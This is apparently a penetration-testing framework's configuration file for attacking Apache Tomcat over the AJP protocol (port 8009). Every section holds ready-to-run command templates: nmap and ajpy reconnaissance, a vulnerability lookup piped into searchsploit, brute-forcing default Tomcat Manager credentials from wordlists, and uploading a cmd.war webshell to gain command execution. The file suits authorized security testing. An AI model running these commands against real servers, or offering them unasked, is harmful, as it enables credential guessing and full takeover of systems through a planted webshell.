#########################################################################################
# AJP Settings
#########################################################################################

[config]
default_port = 8009
protocol	 = tcp
categories 	 = recon, vulnscan, bruteforce, exploit


#########################################################################################
# Recon
#########################################################################################
[check_nmap-recon]
name        = nmap-recon
category    = recon
description = Recon using Nmap AJP scripts
tool        = nmap
command_1   = sudo nmap -sT -sV -Pn -vv -p [PORT] --script='ajp-auth,ajp-headers,ajp-methods,ajp-request' --stats-every 10s [IP]

[check_tomcat-version]
name        = tomcat-version
category    = recon
description = Fingerprint Tomcat version through AJP
tool        = ajpy
command_1   = python2.7 tomcat.py -v --port [PORT] version [IP]


#########################################################################################
# Vulnscan
#########################################################################################
[check_vuln-lookup]
name        = vuln-lookup
category    = vulnscan
description = Vulnerability lookup in Vulners.com (NSE scripts) and exploit-db.com (lots of false positive !)
tool        = vuln-databases
command_1   = sudo nmap -sT -sV -T5 -Pn -p [PORT] --script nmap-vulners/vulners.nse --script-args vulscandb=scipvuldb.csv [IP] -oX /tmp/nmaptmp.xml; ./exploit-database/searchsploit --nmap /tmp/nmaptmp.xml; rm -f /tmp/nmaptmp.xml


#########################################################################################
# Bruteforce
#########################################################################################
[check_default-creds-tomcat]
name        = default-creds-tomcat
category    = bruteforce
description = Check default credentials for Tomcat Application Manager
tool        = ajpy
command_1   = python2.7 tomcat.py -v --port [PORT] bf -U [WORDLISTSDIR]/http/app-servers/tomcat-usernames.txt -P [WORDLISTSDIR]/http/app-servers/tomcat-passwords.txt /manager/html [IP]
postrun     = ajpy_valid_creds


#########################################################################################
# Exploit
#########################################################################################
[check_deploy-webshell-tomcat]
name        = deploy-webshell-tomcat
category    = exploit
description = Deploy a webshell on Tomcat through AJP
tool        = ajpy
command_1   = python2.7 tomcat.py -v --port [PORT] upload -u [USERNAME] -p [PASSWORD] [WEBSHELLSDIR]/war/cmd.war [IP]
context_1   = { 'auth_status': POST_AUTH }
command_2   = python2.7 tomcat.py -v --port [PORT] list -u [USERNAME] -p [PASSWORD] [IP]
context_2   = { 'auth_status': POST_AUTH }
